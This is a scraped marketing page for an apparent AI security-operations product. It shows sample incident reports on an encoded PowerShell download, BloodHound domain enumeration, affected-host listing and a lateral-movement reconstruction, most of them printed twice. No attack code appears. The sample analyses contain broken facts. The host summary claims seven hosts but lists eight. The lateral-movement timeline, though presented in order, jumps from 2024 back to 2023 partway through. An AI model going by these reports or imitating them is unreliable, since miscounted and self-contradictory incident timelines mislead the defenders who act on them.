Request Free Access
Enter your contact information to receive access to the control panel
By submitting this form, you agree to our Privacy Policy and Terms of Service. In accordance with EU regulations, your personal data will be processed and stored securely. You have the right to access, correct, and delete your data at any time.
See AI SOC Analyst in Action
Discover how SOC Jedi.AI revolutionizes cybersecurity operations with advanced AI-driven investigations. From automating routine tasks to providing deep threat insights, explore how organizations like yours can transform their SOC performance.
See How SOC Jedi.AI Delivers Actionable Insights with Every Investigation
The Future of Incident Investigations
Modern cybersecurity demands faster, smarter, and more adaptive investigation processes. SOC Jedi.AI empowers your SOC team by combining precision, automation, and actionable insights to tackle evolving threats efficiently. Step into the next generation of incident response.
Tailored Reports for SOC Tiers
Provide customized reports designed for L1, L2, and other SOC tiers.
Each report is curated to meet the specific needs of analysts, ensuring clarity and actionable insights.
Each report is curated to meet the specific needs of analysts, ensuring clarity and actionable insights.
Actionable Insights Within Reports
Enable swift response with built-in automatic and semi-automatic actions directly accessible in the report interface.
Reduce MTTR and improve operational efficiency with just a few clicks.
Reduce MTTR and improve operational efficiency with just a few clicks.
Threat Detailing for Deep Analysis
Access comprehensive threat intelligence, including detailed malware descriptions, attack chain reconstruction, and potential consequences.
Equip your team with the data needed to understand and mitigate risks effectively.
Equip your team with the data needed to understand and mitigate risks effectively.
Use Cases
SOC Jedi.AI is an advanced AI SOC Analyst that transforms how incident investigations are conducted in cybersecurity. By integrating cutting-edge technology, SOC Jedi.AI delivers fast and accurate investigations, enabling your SOC team to focus on high-value tasks rather than routine work.
An example of investigating suspicious PowerShell commands executed on a compromised node, identifying the attack chain and impacted accounts, and providing recommended actions to mitigate the threat.
Incident Investigation Report
Executive Summary
On 2024.03.18, multiple suspicious activities were detected on the workstation ALPHA-WS-001, associated with user j_smith. These activities involved the execution of encoded PowerShell commands and connections to an external IP address, indicating a potential security breach.
Incident Details
1. Affected Systems and Accounts
2024.03.18 14:32:56: Detection of a Base64 encoded PowerShell process on ALPHA-WS-001
2024.03.18 14:33:00: ALPHA-WS-001 established a TCP connection with 203.0.113.100
2024.03.18 14:33:56: User j_smith executed an encoded PowerShell command to download a payload from 203.0.113.100:8080
3. Technical Analysis
The incident involved:
Risk Assessment
Severity: INCIDENT
Impact: Potential data exfiltration, system compromise, and lateral movement within the network
Recommended Actions
1. Immediate Response
Conclusion
This incident demonstrates characteristics of a targeted attack, utilizing sophisticated techniques such as encoded commands and potential malware deployment. Swift action is crucial to mitigate risks and prevent further compromise of our systems.
Executive Summary
On 2024.03.18, multiple suspicious activities were detected on the workstation ALPHA-WS-001, associated with user j_smith. These activities involved the execution of encoded PowerShell commands and connections to an external IP address, indicating a potential security breach.
Incident Details
1. Affected Systems and Accounts
- Workstation: ALPHA-WS-001 (compromised)
- User Account: j_smith (potentially compromised)
- External IP: 203.0.113.100 (suspected command-and-control server)
2024.03.18 14:32:56: Detection of a Base64 encoded PowerShell process on ALPHA-WS-001
2024.03.18 14:33:00: ALPHA-WS-001 established a TCP connection with 203.0.113.100
2024.03.18 14:33:56: User j_smith executed an encoded PowerShell command to download a payload from 203.0.113.100:8080
3. Technical Analysis
The incident involved:
- Execution of Base64 encoded PowerShell commands
- Network connection to a suspicious external IP address
- Download of potentially malicious payload
Risk Assessment
Severity: INCIDENT
Impact: Potential data exfiltration, system compromise, and lateral movement within the network
Recommended Actions
1. Immediate Response
- Isolate ALPHA-WS-001 from the network to contain the threat
- Conduct comprehensive traffic analysis and log examination
- Update all endpoint security solutions across the network
- Contact j_smith to find out the legitimacy of the actions
- Reset credentials for the j_smith account
- Notify all users about the potential compromise
- Conduct an organization-wide security awareness briefing
- Perform in-depth forensic analysis on ALPHA-WS-001
- Determine the full extent of the attack and potential data compromise
- Review and update security policies and monitoring rules
- Implement additional security measures to prevent similar incidents
Conclusion
This incident demonstrates characteristics of a targeted attack, utilizing sophisticated techniques such as encoded commands and potential malware deployment. Swift action is crucial to mitigate risks and prevent further compromise of our systems.
An example of analyzing a security incident involving LDAP queries and domain information gathering using SharpHound, identifying the attack chain, impacted accounts, and suggesting immediate and long-term security measures.
Incident Investigation Report
Executive Summary
On 2024.03.18, suspicious activities were detected on the corporate network involving unauthorized domain information gathering and multiple LDAP queries. This report details the incident, its potential impact, and recommended actions for mitigation and prevention.
Incident Details
1. Affected Systems and Accounts
The incident involved the use of BloodHound, an Active Directory reconnaissance tool, to collect sensitive domain information. Concurrent LDAP queries suggest potential automated enumeration attempts. These activities indicate a possible attempt to map the network structure and identify potential attack vectors.
Risk Assessment
Severity: INCIDENT
Impact:
Recommended Actions
1. Immediate Response
Conclusion
The detected activities represent a significant security risk to the organization's network infrastructure. Immediate action is required to mitigate potential threats and prevent future incidents. Ongoing monitoring and security improvements are essential to maintain the integrity and confidentiality of the corporate network.
Executive Summary
On 2024.03.18, suspicious activities were detected on the corporate network involving unauthorized domain information gathering and multiple LDAP queries. This report details the incident, its potential impact, and recommended actions for mitigation and prevention.
Incident Details
1. Affected Systems and Accounts
- Workstation: ALPHA-WS-042 (192.168.10.75)
- Domain Controller: OMEGA-DC-001 (192.168.1.10)
- User Account: j_thompson
- 2024.03.18 14:59:47: User j_thompson initiated domain information gathering using BloodHound tool from ALPHA-WS-042.
- 2024.03.18 14:59:47: Multiple identical LDAP queries executed from ALPHA-WS-042 to OMEGA-DC-001.
- 2024.03.18 14:59:49: Domain information gathering process completed by user j_thompson.
The incident involved the use of BloodHound, an Active Directory reconnaissance tool, to collect sensitive domain information. Concurrent LDAP queries suggest potential automated enumeration attempts. These activities indicate a possible attempt to map the network structure and identify potential attack vectors.
Risk Assessment
Severity: INCIDENT
Impact:
- Potential exposure of sensitive domain structure and user information
- Risk of privilege escalation and lateral movement within the network
- Possible data exfiltration or preparation for future attacks
Recommended Actions
1. Immediate Response
- Isolate ALPHA-WS-042 from the network to prevent further unauthorized actions.
- Suspend user account j_thompson pending investigation.
- Preserve all relevant logs and system states for forensic analysis.
- Conduct a comprehensive review of j_thompson's account activities and permissions.
- Implement stricter access controls and monitoring for privileged accounts.
- Enforce multi-factor authentication across all user accounts.
- Perform in-depth analysis of OMEGA-DC-001 logs to identify all actions by j_thompson.
- Examine ALPHA-WS-042 for indicators of compromise, including malware scans and memory analysis.
- Review network traffic logs for potential data exfiltration attempts.
- Deploy advanced endpoint detection and response (EDR) solutions on all workstations.
- Implement network segmentation to limit lateral movement capabilities.
- Enhance logging and alerting mechanisms for suspicious activities, particularly for domain enumeration and mass LDAP queries.
- Conduct regular security awareness training for all employees, focusing on insider threats and social engineering tactics.
Conclusion
The detected activities represent a significant security risk to the organization's network infrastructure. Immediate action is required to mitigate potential threats and prevent future incidents. Ongoing monitoring and security improvements are essential to maintain the integrity and confidentiality of the corporate network.
An example of identifying affected nodes through the analysis of compromised devices, user accounts, and network segments during an incident investigation.
Incident Investigation Report
After analyzing the final document, no new hosts were introduced beyond those previously identified in the analysis of the earlier files.
Final Summary of Distinct Hosts Identified Across All Files
This concludes the comprehensive analysis of different hosts mentioned in the security incidents documented across all the files you have uploaded. A total of seven distinct hosts have been identified from the analyzed data.
If you have any more specific inquiries or need further assistance with the data or any other task, feel free to let me know!
After analyzing the final document, no new hosts were introduced beyond those previously identified in the analysis of the earlier files.
Final Summary of Distinct Hosts Identified Across All Files
- exchange.company.net
- backup.company.net
- larry.company.net
- liam.company.net
- george.company.net
- dc.company.net
- david.company.net
- dga-v.cm.com-svc-id.net
This concludes the comprehensive analysis of different hosts mentioned in the security incidents documented across all the files you have uploaded. A total of seven distinct hosts have been identified from the analyzed data.
If you have any more specific inquiries or need further assistance with the data or any other task, feel free to let me know!
An example of reconstructing lateral movements by analyzing interactions and incidents across multiple data sources, identifying potential pathways and methodologies used by unauthorized actors within the network.
Incident Investigation Report
Incident Analysis: Lateral Movement Reconstruction
Based on the comprehensive analysis of available data across multiple sources, we have reconstructed a hypothetical pathway of lateral movements potentially utilized by an unauthorized actor within the network.
This reconstruction is based on the chronological appearance of identified hosts and the contextual information provided in each data source regarding the nature of interactions and incidents involving these systems.
Initial Compromise
2024.04.15 08:13:17 - server01.alpha.local: The attack vector appears to originate with multiple failed authentication attempts on server01.alpha.local, potentially indicating a brute-force attack or probing of misconfigured access controls. This system serves as the initial point of compromise.
Secondary Target
2024.04.15 09:37:32 - archive02.alpha.local: The threat actor likely pivoted to archive02.alpha.local, a system potentially housing critical backups or archives. This move suggests an attempt to access sensitive information or leverage backup data for deeper network penetration.
User Workstation Exploitation
a) 2024.04.15 11:02:45 - jsmith.alpha.local
b) 2024.04.15 13:26:28 - agarcia.alpha.local
Interaction with these personal workstations indicates either targeted user account compromise or leveraging of obtained credentials for further lateral movement.
Elevated Access
2023.05.15 16:49:03 - mthompson.alpha.local: The compromise of mthompson.alpha.local suggests escalation to a potentially privileged user account, enabling broader network access and control.
Critical Infrastructure Targeting
a) 2023.05.15 19:22:51 - dc01.alpha.local
b) 2023.05.15 21:45:17 - rjohnson.alpha.local
The final known movements involve dc01.alpha.local (possibly a Domain Controller) and rjohnson.alpha.local, indicating attempts to access core network services and additional user systems. This stage represents the deepest known network penetration, potentially facilitating data exfiltration, credential harvesting, or establishing persistence.
Incident Analysis: Lateral Movement Reconstruction
Based on the comprehensive analysis of available data across multiple sources, we have reconstructed a hypothetical pathway of lateral movements potentially utilized by an unauthorized actor within the network.
This reconstruction is based on the chronological appearance of identified hosts and the contextual information provided in each data source regarding the nature of interactions and incidents involving these systems.
Initial Compromise
2024.04.15 08:13:17 - server01.alpha.local: The attack vector appears to originate with multiple failed authentication attempts on server01.alpha.local, potentially indicating a brute-force attack or probing of misconfigured access controls. This system serves as the initial point of compromise.
Secondary Target
2024.04.15 09:37:32 - archive02.alpha.local: The threat actor likely pivoted to archive02.alpha.local, a system potentially housing critical backups or archives. This move suggests an attempt to access sensitive information or leverage backup data for deeper network penetration.
User Workstation Exploitation
a) 2024.04.15 11:02:45 - jsmith.alpha.local
b) 2024.04.15 13:26:28 - agarcia.alpha.local
Interaction with these personal workstations indicates either targeted user account compromise or leveraging of obtained credentials for further lateral movement.
Elevated Access
2023.05.15 16:49:03 - mthompson.alpha.local: The compromise of mthompson.alpha.local suggests escalation to a potentially privileged user account, enabling broader network access and control.
Critical Infrastructure Targeting
a) 2023.05.15 19:22:51 - dc01.alpha.local
b) 2023.05.15 21:45:17 - rjohnson.alpha.local
The final known movements involve dc01.alpha.local (possibly a Domain Controller) and rjohnson.alpha.local, indicating attempts to access core network services and additional user systems. This stage represents the deepest known network penetration, potentially facilitating data exfiltration, credential harvesting, or establishing persistence.
Contact Us
Please provide your contact information where we can send you access details for the control panel or respond to any inquiries you may have
By submitting this form, you agree to our Privacy Policy and Terms of Service. In accordance with EU regulations, your personal data will be processed and stored securely. You have the right to access, correct, and delete your data at any time.